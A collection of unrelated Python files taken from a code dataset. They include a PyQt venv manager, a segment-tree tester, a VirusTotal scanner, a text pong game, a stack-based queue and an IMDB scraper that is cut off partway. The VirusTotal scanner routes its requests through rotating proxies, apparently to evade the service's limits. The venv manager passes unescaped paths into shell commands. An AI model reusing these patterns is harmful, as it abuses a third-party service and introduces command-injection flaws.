print(nic.name)\n print(nic.ip4)\n for host in nic.ip4.network:\n print(host)\n for port in host:\n print(port)\n\n\nif __name__ == '__main__':\n _main()\n","sub_path":"src/pea/interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":3793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"453979655","text":"# -*- coding: utf-8 -*-\n\"\"\"\nThis module contains the tables.\n\"\"\"\nimport webbrowser\nimport shutil\nimport os\nimport logging\nfrom functools import partial\n\nfrom PyQt5.QtGui import QIcon, QCursor\nfrom PyQt5.QtCore import 
pyqtSignal, QThread, QTimer\nfrom PyQt5.QtWidgets import (\n QStyle,\n QAction,\n QTableView,\n QMenu,\n QMessageBox,\n QFileDialog,\n QInputDialog\n)\n\nimport get_data\nimport creator\nfrom dialogs import ConsoleDialog, ProgBarDialog\nfrom creator import CloningWorker\nfrom manage_pip import PipManager\n\n\nlogger = logging.getLogger(__name__)\n\n\n\nclass BaseTable(QTableView):\n \"\"\"The base table for all tables.\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.delete_icon = QIcon(\n self.style().standardIcon(QStyle.SP_TrashIcon)\n )\n self.info_icon = QIcon(\n self.style().standardIcon(QStyle.SP_FileDialogInfoView)\n )\n\n def get_selected_item(self):\n \"\"\"\n Get the item name of the selected row (index 0).\n \"\"\"\n listed_items = self.selectionModel().selectedRows()\n for index in listed_items:\n selected_item = index.data()\n return selected_item\n\n\n\nclass VenvTable(BaseTable):\n \"\"\"List the virtual environments found.\n \"\"\"\n started = pyqtSignal()\n finished = pyqtSignal()\n text_changed = pyqtSignal(str)\n refresh = pyqtSignal()\n\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.drive_icon = QIcon(\n self.style().standardIcon(QStyle.SP_DriveHDIcon)\n )\n self.delete_icon = QIcon(\n self.style().standardIcon(QStyle.SP_TrashIcon)\n )\n self.save_icon = QIcon(\n self.style().standardIcon(QStyle.SP_DialogSaveButton)\n )\n self.folder_icon = QIcon(\n self.style().standardIcon(QStyle.SP_DirOpenIcon)\n )\n\n self.progress_bar = ProgBarDialog()\n self.console = ConsoleDialog()\n self.thread = QThread(self)\n self.m_clone_repo_worker = CloningWorker()\n\n # thread\n self.thread.start()\n self.m_clone_repo_worker.moveToThread(self.thread)\n self.m_clone_repo_worker.started.connect(self.progress_bar.exec_)\n self.m_clone_repo_worker.finished.connect(self.progress_bar.close)\n self.m_clone_repo_worker.finished.connect(self.finish_info)\n\n # perform a proper stop using quit() and wait()\n self.thread.finished.connect(self.thread.quit)\n self.thread.finished.connect(self.thread.wait)\n\n\n def contextMenuEvent(self, event):\n context_menu = QMenu(self)\n\n # pop up only if clicking on a row\n if self.indexAt(event.pos()).isValid():\n context_menu.popup(QCursor.pos())\n\n # sub menus\n details_sub_menu = QMenu(\n \"Det&ails\",\n self,\n icon=self.info_icon\n )\n install_sub_menu = QMenu(\n \"&Install\",\n self,\n icon=QIcon.fromTheme(\"software-install\")\n )\n editable_sub_menu = QMenu(\n \"&Editable\",\n self,\n icon=QIcon.fromTheme(\"software-install\")\n )\n\n\n #]===================================================================[#\n #] ACTIONS [#========================================================[#\n #]===================================================================[#\n\n upgrade_pip_action = QAction(\n QIcon.fromTheme(\"system-software-update\"),\n \"&Upgrade Pip to latest\",\n self,\n statusTip=\"Upgrade Pip to the latest version\"\n )\n upgrade_pip_action.triggered.connect(\n lambda: self.upgrade_pip(event)\n )\n\n install_packages_action = QAction(\n \"Install &additional packages\",\n self,\n statusTip=\"Install additional packages\"\n )\n install_packages_action.triggered.connect(\n lambda: self.add_packages(event)\n )\n\n install_requires_action = QAction(\n \"Install from &requirements\",\n self,\n statusTip=\"Install packages from requirements\"\n )\n install_requires_action.triggered.connect(\n lambda: self.install_requires(event)\n )\n\n install_local_action = QAction(\n 
\"Install &local project\",\n self,\n statusTip=\"Install a local project\"\n )\n install_local_action.triggered.connect(\n lambda: self.install_local(event)\n )\n\n install_vsc_action = QAction(\n \"Install from &repository\",\n self,\n statusTip=\"Install from VSC repository\"\n )\n install_vsc_action.triggered.connect(\n lambda: self.install_vsc(event)\n )\n\n save_requires_action = QAction(\n self.save_icon,\n \"Save &requirements\",\n self,\n statusTip=\"Write requirements to file\"\n )\n save_requires_action.triggered.connect(\n lambda: self.save_requires(event)\n )\n\n list_packages_action = QAction(\n \"&List installed packages\",\n self,\n statusTip=\"List installed packages\"\n )\n list_packages_action.triggered.connect(\n lambda: self.list_packages(event, style=1)\n )\n\n list_freeze_action = QAction(\n \"Show &freeze output\",\n self,\n statusTip=\"List the output of 'pip freeze'\"\n )\n list_freeze_action.triggered.connect(\n lambda: self.freeze_packages(event, style=2)\n )\n\n list_deptree_action = QAction(\n \"Display &dependency tree\",\n self,\n statusTip=\"List dependencies with 'pipdeptree'\"\n )\n list_deptree_action.triggered.connect(\n lambda: self.deptree_packages(event, style=3)\n )\n\n open_venv_dir_action = QAction(\n self.folder_icon,\n \"&Open containing folder\",\n self,\n statusTip=\"Open the folder containing the virtual environment\"\n )\n open_venv_dir_action.triggered.connect(\n lambda: self.open_venv_dir(event)\n )\n\n delete_venv_action = QAction(\n self.delete_icon,\n \"&Delete environment\",\n self,\n statusTip=\"Delete environment\"\n )\n delete_venv_action.triggered.connect(\n lambda: self.delete_venv(event)\n )\n\n\n #]===================================================================[#\n #] MENUS [#==========================================================[#\n #]===================================================================[#\n\n context_menu.addAction(upgrade_pip_action)\n\n # install sub menu\n context_menu.addMenu(install_sub_menu)\n install_sub_menu.addAction(install_packages_action)\n install_sub_menu.addAction(install_requires_action)\n install_sub_menu.addAction(install_local_action)\n install_sub_menu.addAction(install_vsc_action)\n\n # details sub meun\n context_menu.addMenu(details_sub_menu)\n details_sub_menu.addAction(list_packages_action)\n details_sub_menu.addAction(list_freeze_action)\n details_sub_menu.addAction(list_deptree_action)\n\n context_menu.addAction(save_requires_action)\n context_menu.addAction(open_venv_dir_action)\n context_menu.addAction(delete_venv_action)\n\n\n def valid_version(self, venv_path):\n \"\"\"Test wether the Python version required is installed.\n \"\"\"\n cfg_file = os.path.join(venv_path, \"pyvenv.cfg\")\n is_installed = get_data.get_pyvenv_cfg(cfg_file, \"installed\")\n version = get_data.get_pyvenv_cfg(cfg_file, \"version\")\n py_path = get_data.get_pyvenv_cfg(cfg_file, \"py_path\")\n msg_txt = (\n f\"This environment requires {version} \\nfrom {py_path} which is \\nnot installed.\\n\"\n )\n\n if is_installed == \"no\":\n msg_box = QMessageBox(\n QMessageBox.Critical,\n \"Error\",\n msg_txt,\n QMessageBox.Ok,\n self\n )\n msg_box.exec_()\n return False\n return True\n\n\n def venv_exists(self, path):\n \"\"\"\n Test wether the directory of the selected environment actually exists.\n \"\"\"\n if os.path.exists(path):\n return True\n\n msg_box = QMessageBox(\n QMessageBox.Critical,\n \"Error\",\n \"Selected environment could not be found.\",\n QMessageBox.Ok,\n self\n )\n msg_box.exec_()\n 
self.refresh.emit()\n return False\n\n\n def has_pip(self, venv_dir, venv_name):\n \"\"\"Test if `pip` is installed.\n \"\"\"\n venv_path = os.path.join(venv_dir, venv_name)\n pip_binary = os.path.join(venv_path, \"bin\", \"pip\")\n has_pip = os.path.exists(pip_binary)\n\n if self.venv_exists(venv_path) and self.valid_version(venv_path):\n if has_pip:\n return True\n QMessageBox.information(\n self,\n \"Info\",\n \"This environment has no Pip installed.\"\n )\n return False\n return False\n\n\n def upgrade_pip(self, event):\n \"\"\"Run `pip install --upgrade pip` command.\n \"\"\"\n active_dir = get_data.get_active_dir_str()\n venv = self.get_selected_item()\n\n if self.has_pip(active_dir, venv):\n self.console.setWindowTitle(\"Updating Pip\")\n logger.info(\"Attempting to update Pip...\")\n\n self.manager = PipManager(active_dir, venv)\n self.manager.run_pip(creator.cmds[0], [creator.opts[0], \"pip\"])\n self.manager.started.connect(self.console.exec_)\n\n # display the updated output\n self.manager.textChanged.connect(self.console.update_status)\n\n # clear the content on window close\n if self.console.close:\n self.console.console_window.clear()\n\n\n def add_packages(self, event):\n \"\"\"\n Install additional packages into the selected environment.\n \"\"\"\n pass\n\n\n def install_requires(self, event):\n \"\"\"\n Install packages from a requirements file into the\n selected environment.\n \"\"\"\n active_dir = get_data.get_active_dir_str()\n venv = self.get_selected_item()\n\n if self.has_pip(active_dir, venv):\n file_name = QFileDialog.getOpenFileName(\n self,\n \"Select a requirements\"\n )\n file_path = file_name[0]\n\n if file_path != \"\":\n creator.fix_requirements(file_path)\n self.console.setWindowTitle(\"Installing from requirements\")\n logger.info(\"Installing from requirements...\")\n\n self.manager = PipManager(active_dir, venv)\n self.manager.run_pip(\n creator.cmds[0], [creator.opts[1], f\"'{file_path}'\"]\n )\n self.manager.started.connect(self.console.exec_)\n\n # display the updated output\n self.manager.textChanged.connect(self.console.update_status)\n\n # clear the content on window close\n if self.console.close:\n self.console.console_window.clear()\n\n\n def install_local(self, event):\n \"\"\"Install from a local project.\n \"\"\"\n active_dir = get_data.get_active_dir_str()\n venv = self.get_selected_item()\n\n if self.has_pip(active_dir, venv):\n project_dir = QFileDialog.getExistingDirectory(\n self,\n \"Select project directory\"\n )\n project_name = os.path.basename(project_dir)\n\n if project_dir != \"\":\n self.console.setWindowTitle(f\"Installing {project_name}\")\n logger.info(\"Installing from local project path...\")\n\n self.manager = PipManager(active_dir, venv)\n self.manager.run_pip(\n creator.cmds[0], [creator.opts[2], f\"'{project_dir}'\"]\n )\n self.manager.started.connect(self.console.exec_)\n\n # display the updated output\n self.manager.textChanged.connect(self.console.update_status)\n\n # clear the content on window close\n if self.console.close:\n self.console.console_window.clear()\n\n\n def install_vsc(self, event):\n \"\"\"Install from a VSC repository.\n \"\"\"\n active_dir = get_data.get_active_dir_str()\n venv = self.get_selected_item()\n venv_bin = os.path.join(active_dir, venv, \"bin\", \"python\")\n\n if self.has_pip(active_dir, venv):\n url, ok = QInputDialog.getText(\n self,\n \"Specify VSC project url\",\n \"Enter url to repository:\" + \" \" * 65\n )\n\n if url != \"\":\n project_name = os.path.basename(url)\n project_url = 
f\"git+{url}#egg={project_name}\"\n cmd = (\n f\"{venv_bin} -m pip install --no-cache-dir -e {project_url}\"\n )\n self.progress_bar.setWindowTitle(f\"Installing {project_name}\")\n self.progress_bar.status_label.setText(\"Cloning repository...\")\n logger.info(f\"Installing {project_name}...\")\n\n wrapper = partial(\n self.m_clone_repo_worker.run_process, cmd\n )\n QTimer.singleShot(0, wrapper)\n\n\n def finish_info(self):\n \"\"\"\n Show an info message when the cloning process has finished successfully.\n \"\"\"\n msg_txt = (\n \"Successfully installed package \\nfrom VSC repository.\\n\"\n )\n QMessageBox.information(self, \"Done\", msg_txt)\n\n\n def save_requires(self, event):\n \"\"\"\n Write the requirements of the selected environment to file.\n \"\"\"\n active_dir = get_data.get_active_dir_str()\n venv = self.get_selected_item()\n venv_dir = os.path.join(active_dir, venv)\n\n if self.has_pip(active_dir, venv):\n save_file = QFileDialog.getSaveFileName(\n self,\n \"Save requirements\",\n directory=f\"{venv_dir}/requirements.txt\"\n )\n save_path = save_file[0]\n\n if save_path != \"\":\n logger.info(f\"Saving '{save_path}'...\")\n\n # write 'pip freeze' output to selected file\n self.manager = PipManager(active_dir, venv)\n self.manager.run_pip(creator.cmds[2], [\">\", save_path])\n\n # show an info message\n message_txt = (f\"Saved requirements in \\n{save_path}\")\n QMessageBox.information(self, \"Saved\", message_txt)\n\n\n def list_packages(self, event, style):\n \"\"\"\n Open console dialog and list the installed packages. The argument\n `style` controls which style the output should have: `style=1` for\n `pip list`, `style=2` for `pip freeze` and style=3 for a dependency\n output via `pipdeptree`.\n \"\"\"\n active_dir = get_data.get_active_dir_str()\n venv = self.get_selected_item()\n\n if self.has_pip(active_dir, venv):\n self.console.setWindowTitle(f\"Packages installed in: {venv}\")\n\n self.manager = PipManager(active_dir, f\"'{venv}'\")\n self.manager.run_pip(creator.cmds[style])\n self.manager.started.connect(self.console.exec_)\n\n # display the updated output\n self.manager.textChanged.connect(self.console.update_status)\n\n # clear the content on window close\n if self.console.close:\n self.console.console_window.clear()\n\n\n def freeze_packages(self, event, style):\n \"\"\"Print `pip freeze` output to console window.\n \"\"\"\n self.list_packages(event, style)\n\n\n def deptree_packages(self, event, style):\n \"\"\"\n Test if `pipdeptree` is installed and ask user wether to\n install it if it's not. 
Then call `self.list_packages()`\n \"\"\"\n active_dir = get_data.get_active_dir_str()\n venv = self.get_selected_item()\n pipdeptree_binary = os.path.join(active_dir, venv, \"bin\", \"pipdeptree\")\n has_pipdeptree = os.path.exists(pipdeptree_binary)\n message_txt = (\n \"This requires the pipdeptree package\\nto be installed.\\n\\n\"\n \"Do you want to install it?\\n\"\n )\n\n if has_pipdeptree:\n self.list_packages(event, style)\n else:\n if self.has_pip(active_dir, venv):\n msg_box_confirm = QMessageBox.question(\n self,\n \"Confirm\",\n message_txt,\n QMessageBox.Yes | QMessageBox.Cancel\n )\n if msg_box_confirm == QMessageBox.Yes:\n self.progress_bar.setWindowTitle(\"Installing\")\n self.progress_bar.status_label.setText(\n \"Installing pipdeptree...\"\n )\n logger.info(\"Installing pipdeptree...\")\n\n self.manager = PipManager(active_dir, venv)\n self.manager.run_pip(\n creator.cmds[0], [creator.opts[0], \"pipdeptree\"]\n )\n self.manager.started.connect(self.progress_bar.exec_)\n self.manager.finished.connect(self.progress_bar.close)\n self.manager.process_stop()\n self.list_packages(event, style)\n\n\n def open_venv_dir(self, event):\n \"\"\"Open the selected venv directory.\n \"\"\"\n active_dir = get_data.get_active_dir_str()\n venv = self.get_selected_item()\n venv_dir = os.path.join(active_dir, venv)\n\n if os.path.isdir(venv_dir):\n os.system(f\"xdg-open '{venv_dir}'\")\n\n\n def delete_venv(self, event):\n \"\"\"\n Delete the selected virtual environment by clicking\n delete from the context menu in venv table.\n \"\"\"\n active_dir = get_data.get_active_dir_str()\n venv = self.get_selected_item()\n venv_path = os.path.join(active_dir, venv)\n\n if self.venv_exists(venv_path):\n msg_box_critical = QMessageBox.critical(\n self,\n \"Confirm\",\n f\"Are you sure you want to delete '{venv}'?\",\n QMessageBox.Yes | QMessageBox.Cancel\n )\n if msg_box_critical == QMessageBox.Yes:\n shutil.rmtree(venv_path)\n logging.info(f\"Successfully deleted '{venv_path}'\")\n self.refresh.emit()\n\n\n\nclass ResultsTable(BaseTable):\n \"\"\"Contains the results from PyPI.\n \"\"\"\n context_triggered = pyqtSignal()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.info_icon = QIcon(\n self.style().standardIcon(QStyle.SP_FileDialogInfoView)\n )\n\n def contextMenuEvent(self, event):\n context_menu = QMenu(self)\n\n # pop up only if clicking on a row\n if self.indexAt(event.pos()).isValid():\n context_menu.popup(QCursor.pos())\n\n install_action = QAction(\n QIcon.fromTheme(\"software-install\"),\n \"&Install module\",\n self,\n statusTip=\"Install module\"\n )\n context_menu.addAction(install_action)\n # connect to install_package() in InstallPackages() in wizard\n install_action.triggered.connect(\n lambda: self.context_triggered.emit()\n )\n\n open_pypi_action = QAction(\n self.info_icon,\n \"&Open on PyPI\",\n self,\n statusTip=\"Open on Python Package Index\"\n )\n context_menu.addAction(open_pypi_action)\n open_pypi_action.triggered.connect(\n lambda: self.open_on_pypi(event)\n )\n\n\n def open_on_pypi(self, event):\n \"\"\"\n Open pypi.org and show the project description\n of the selected package.\n \"\"\"\n url = \"https://pypi.org/project\"\n package = self.get_selected_item()\n webbrowser.open(\"/\".join([url, package, \"#description\"]))\n\n\n\nclass InterpreterTable(BaseTable):\n \"\"\"\n List the Python installs found.\n \"\"\"\n drop_item = pyqtSignal()\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n\n def 
contextMenuEvent(self, event):\n context_menu = QMenu(self)\n\n # pop up only if clicking on a row\n if self.indexAt(event.pos()).isValid():\n context_menu.popup(QCursor.pos())\n\n remove_py_action = QAction(\n self.delete_icon,\n \"&Remove from list\",\n self,\n statusTip=\"Remove this item from the table\"\n )\n context_menu.addAction(remove_py_action)\n remove_py_action.triggered.connect(\n lambda: self.remove_python(event)\n )\n\n\n def remove_python(self, event):\n \"\"\"Remove a Python version from the table.\n \"\"\"\n item = self.get_selected_item()\n\n msg_box_warning = QMessageBox.warning(\n self,\n \"Confirm\",\n \"Remove this item from list. \\nAre you sure?\",\n QMessageBox.Yes | QMessageBox.Cancel\n )\n if msg_box_warning == QMessageBox.Yes:\n with open(get_data.DB_FILE, \"r\") as f:\n lines = f.readlines()\n with open(get_data.DB_FILE, \"w\") as f:\n for line in lines:\n if item not in line:\n f.write(line)\n\n logging.info(f\"Removed '{item}' from database\")\n self.drop_item.emit()\n","sub_path":"venvipy/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":22059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"7428083","text":"from code_tester import rand, show, reader, randomize\n\ndebug = False\n\namax = int(10000)\nn = rand(5,1000)\nq = rand(5,100000)\n\nif(debug):\n amax = 2\n n = 4\n q = 3\n\nprint(n,q)\n\nfor i in range(n):\n print(rand(amax),end=' ')\nprint()\n\nfor test in range(q):\n \"\"\"\n main test case loop\n \"\"\"\n t = rand(0,2)\n a = rand(1,n-3)\n if(t==0):\n b = rand(a,n)\n print(t,a,b)\n if(t==1):\n b = rand(0,amax)\n print(t,a,b)\n if(t==2):\n b = rand(a,n)\n c = rand(1,2)\n print(t,a,b,c)\n","sub_path":"algos/array/segtrees/seg_tree/usage/range_sum/range_sum_lazy/tester.py","file_name":"tester.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"97046007","text":"import requests\nimport random\nimport time\nimport os\nfrom urllib import parse\nclass virustotal:\n def __init__(self):\n self.agents=[\n \"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0; AOL 9.5; AOLBuild 4337.35; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\",\n \"Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)\",\n \"Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 2.0.50727; Media Center PC 6.0)\",\n \"Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET CLR 1.0.3705; .NET CLR 1.1.4322)\",\n \"Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; InfoPath.2; .NET CLR 3.0.04506.30)\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)\",\n \"Mozilla/5.0 (X11; U; Linux; en-US) AppleWebKit/527+ (KHTML, like Gecko, Safari/419.3) Arora/0.6\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.2pre) Gecko/20070215 K-Ninja/2.1.1\",\n \"Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/20080705 Firefox/3.0 Kapiko/3.0\",\n \"Mozilla/5.0 (X11; Linux i686; 
U;) Gecko/20070322 Kazehakase/0.4.5\",\n            \"Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.8) Gecko Fedora/1.9.0.8-1.fc10 Kazehakase/0.5.6\",\n            \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11\",\n            \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20\",\n            \"Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52\",\n]\n        self.ip=[]\n        # path=os.getcwd()\n        path=os.path.dirname(os.path.abspath(__file__))\n        # f=open(\"/home/ubuntu/MaliciousApplicationDetector/DataLabeler/proxies3.txt\",\"rb\")\n        f=open(os.path.join(path, \"proxies3.txt\"), \"rb\")\n        line=f.readline()\n        count=0\n        while line:\n            count+=1\n            raw=line.split()\n            self.ip.append(raw[1].decode(\"gb2312\")+\":\"+raw[2].decode(\"gb2312\"))\n            line=f.readline()\n            if line:\n                line=f.readline()\n        print(\"Initialization finished, found:\",count,\"usable proxies\")\n        f.close()\n\n    def label(self,url):\n        data=self.PostAndScan(url)\n        if not data:\n            print(\"Scan failed\")\n            return False\n        result=self.GetReport(data)\n        if not result:\n            print(\"Scan failed\")\n            return False\n        return result\n\n    def PostAndScan(self,url):\n        dict={\"url\":url}\n        u=parse.urlencode(dict)\n        u = \"https://www.virustotal.com/ui/urls?\"+u\n        retry_time=0\n        while retry_time<100:\n            agent=self.GetAgent()\n            ip=self.GetIP()\n            proxies={\"https\":ip}\n            print(\"Scanning:\",u,\"using ip proxy:\",ip,\" using UA:\",agent)\n            try:\n                response = requests.post(u, headers={\n                    #\"User-Agent\": agent,\n                    \"Referer\": \"https://www.virustotal.com/\"},proxies=proxies,timeout=5)\n                return {\"id\":response.json()[\"data\"][\"id\"],\"ip\":ip}\n            except:\n                print(\"Scan failed, retrying...\")\n                retry_time+=1\n        print(\"All 100 retries failed, please check the network!\")\n        return False\n\n\n\n    def GetReport(self,data):\n        scan_id=data[\"id\"]\n        ip=data[\"ip\"]\n        retry_time=0\n        get_url = \"https://www.virustotal.com/ui/analyses/\" + scan_id\n        while retry_time<5:\n            agent=self.GetAgent()\n            proxies = {\"https\": ip}\n            print(\"Fetching report:\",get_url, \"using ip proxy:\", ip)#,\" using UA:\",agent)\n            try:\n                response = requests.get(get_url, headers={\n                    #\"User-Agent\": agent,\n                    \"Referer\": \"https://www.virustotal.com/\"},proxies=proxies,timeout=10)\n                print(\"Report fetched successfully\")\n                #print(response.json())\n                return {\"malicious\":response.json()[\"data\"][\"attributes\"][\"stats\"]['malicious'],\"suspicious\":response.json()[\"data\"][\"attributes\"][\"stats\"]['suspicious']}\n            except:\n                print(\"Fetching report failed, retrying...\")\n                time.sleep(20)\n                retry_time+=1\n        print(\"All 5 report retries failed, please check the network!\")\n        return False\n\n    def GetAgent(self):\n        return random.choice(self.agents)\n\n    def GetIP(self):\n        return random.choice(self.ip)\n\nif __name__==\"__main__\":\n    lablor=virustotal()\n    url=\"179.43.147.227\"\n    res=lablor.label(url)\n    print(res)\n","sub_path":"mad-proj/DataLabeler/VirusTotal3.py","file_name":"VirusTotal3.py","file_ext":"py","file_size_in_byte":5058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"50488508","text":"#pong.py\n\nimport text_graphics_engine\nimport keyboard\nimport math\nimport random\n\nscreen = text_graphics_engine.screen([80,20],\" \")\npaddle_one = text_graphics_engine.obj([[0,5],[0,6],[0,7],[0,8],[0,9],[0,10]],\"[\",0,screen)\npaddle_two = text_graphics_engine.obj([[80,5],[80,6],[80,7],[80,8],[80,9],[80,10]],\"]\",0,screen)\nball = text_graphics_engine.obj([[40,10]],\"0\",0,screen)\nball_angle = math.radians(45)\nball_speed = 0.5\nball_velo = [0,0]\n\ndone = False\n\nwhile not done:\n    try:\n        if keyboard.is_pressed('p'):\n            done = True\n        if 
keyboard.is_pressed('s'):\n            paddle_one + [0,1]\n        if keyboard.is_pressed('w'):\n            paddle_one + [0,-1]\n        if keyboard.is_pressed('down'):\n            paddle_two + [0,1]\n        if keyboard.is_pressed('up'):\n            paddle_two + [0,-1] \n    except:\n        pass\n    if round(ball.coords[0][1]) == 0 or round(ball.coords[0][1]) == 20:\n        ball_angle = math.degrees(ball_angle)\n        ball_angle = (180-ball_angle)%360\n        ball_angle = math.radians(ball_angle)\n    if (round(ball.coords[0][0]) == 0 or round(ball.coords[0][0]) == 80) and (ball == paddle_one or ball == paddle_two):\n        ball_angle = math.degrees(ball_angle)\n        ball_angle = (360-ball_angle)%360\n        ball_angle += random.randrange(-1,2)\n        ball_speed += 0\n        ball_angle = math.radians(ball_angle)\n    if ball.coords[0][0] < 0 or ball.coords[0][0] > 80:\n        ball.set_coords([[40,10]])\n    \n    ball_velo = [(ball_speed*math.sin(ball_angle)),(ball_speed*math.cos(ball_angle)*-1)]\n    ball + ball_velo\n    screen.clear_screen([ball_speed])","sub_path":"pong.py","file_name":"pong.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"535659873","text":"# # Implement Queue using stack...\n\nfrom Stack import Stack\n\n\nclass QueueUsingStack:\n\n    def __init__(self):\n        self.stack1 = Stack()\n        self.stack2 = Stack()\n        self.size = 10\n\n    def display(self):\n        print(\"Queue currently contains:\")\n        print(self.stack1.get_stack_data())\n\n    def push(self, value):\n        while len(self.stack1.get_stack_data()) != 0:\n            self.stack2.push(self.stack1.pop())\n        self.stack1.push(value)\n        while len(self.stack2.get_stack_data()) != 0:\n            self.stack1.push(self.stack2.pop())\n\n    def pop(self):\n        if len(self.stack1.get_stack_data()) == 0:\n            print(\"Queue is empty.\")\n            return None\n        return self.stack1.pop()\n\n    def get_max_size(self):\n        return self.size\n\n    def set_max_size(self, size):\n        self.size = size\n\n\nq = QueueUsingStack()\nq.push(1)\nq.push(2)\nq.push(3)\nq.display()\nq.pop()\nq.display()\n","sub_path":"stack/Task1.py","file_name":"Task1.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"522768295","text":"from urllib.request import urlopen\nimport json\nimport os.path\nfrom bs4 import BeautifulSoup\nimport pprint\nimport re\n\n\n#### Task 1\nurl= \"https://www.imdb.com/india/top-rated-indian-movies/\"\ndef scrape_top_list():\n    if os.path.exists(\"Top_movies.json\"):\n        with open(\"Top_movies.json\") as file:\n            read_file=file.read()\n            file_store=json.loads(read_file)\n        return file_store\n    page=urlopen(url)\n    soups=BeautifulSoup(page,\"html.parser\")\n    main_div=soups.find(\"div\",class_=\"lister\")\n\n    t_body=main_div.find(\"tbody\",class_=\"lister-list\")\n    trs=t_body.find_all(\"tr\")\n    \n    movie_ranks=[ ]\n    movie_names=[ ]\n    movie_Rating=[ ]\n    movie_year=[ ]\n    movie_url=[ ]\n    movies=[ ]\n    for tr in trs:\n        movie_data=tr.find(\"td\",class_=\"titleColumn\").get_text().strip()\n        rank=\" \"\n        for data in movie_data:\n            if \".\" not in data:\n                rank=rank+data\n            else:\n                break\n        movie_ranks.append(rank)\n\n        movie_name=tr.find(\"td\",class_=\"titleColumn\").a.get_text()\n        movie_names.append(movie_name)\n\n        movie_rating=tr.find(\"td\",class_=\"ratingColumn imdbRating\").get_text().strip()\n        movie_Rating.append(movie_rating)\n\n        year=tr.find(\"td\",class_=\"titleColumn\")\n        years=year.find(\"span\",class_=\"secondaryInfo\").get_text()\n        years=(re.sub('\\((\\d+)\\)',r'\\1',years))\n        movie_year.append(int(years))\n\n        
movie_link=tr.find(\"td\",class_=\"titleColumn\")\n\n        movie_api=movie_link.a[\"href\"]\n        movie_li= \"https://www.imdb.com/\"+movie_api \n        movie_url.append(movie_li)\n    for i in range(0,len(movie_names)):\n        # build a fresh dict per movie, otherwise every list entry points at the same object\n        dis={ }\n        dis[\"name\"] = str(movie_names[i])\n        dis[\"year\"] = movie_year[i]\n        dis[\"position\"] = int(movie_ranks[i])\n        dis[\"rating\"] =float (movie_Rating[i])\n        dis[\"url\"] = movie_url[i]\n\n        movies.append(dis)\n    with open(\"Top_movies.json\",\"w\") as file:\n        json.dump(movies,file,indent=4)\n\n    return movies \nscrapped = (scrape_top_list())\n# print(scrapped)\n\n\n###Task 12\n# caste_url=\"https://www.imdb.com/title/tt0066763/fullcredits?ref_=tt_cl_sm#cast\"\ndef movie_caste_url(url):\n    page=urlopen(url)\n    page_parser=BeautifulSoup(page,\"html.parser\")\n    # print(page_parser)\n    # find_div=page_parser.find(\"div\",id=\"fullcredits_content\",class_=\"header\")\n    # print(find_div)\n    find_table=page_parser.find(\"table\",class_=\"cast_list\")\n    # print(find_table)\n    find_td=find_table.find_all(\"td\",class_=\"\")\n    # print(find_td)\n    name_list=[ ]\n    id_list=[ ]\n    store_list=[ ]\n    for t in find_td:\n        name=(t.get_text()).strip()\n        name_list.append(name)\n        ids=t.find(\"a\")[\"href\"][6:15]\n        id_list.append(ids)\n    for dics_index in range(len(id_list)):\n        ids_dics={ }\n        ids_dics[\"Name\"]=name_list[dics_index]\n        ids_dics[\"ID\"]=id_list[dics_index]\n        store_list.append(ids_dics)\n    return store_list\n\n# id_name=movie_caste_url(caste_url)\n# print(id_name)\n\n#### 4 Task\nurl=(\"https://www.imdb.com/title/tt0066763/\")\ndef scrape_movie_details(movie_url):\n    id_name=movie_caste_url(movie_url)\n    page=urlopen(movie_url)\n    page_soups=BeautifulSoup(page,\"html.parser\")\n\n    name_div=page_soups.find(\"div\",class_=\"title_wrapper\").h1.get_text()\n\n    movie_name=\" \"\n    for n in name_div:\n        if \"(\" not in n:\n            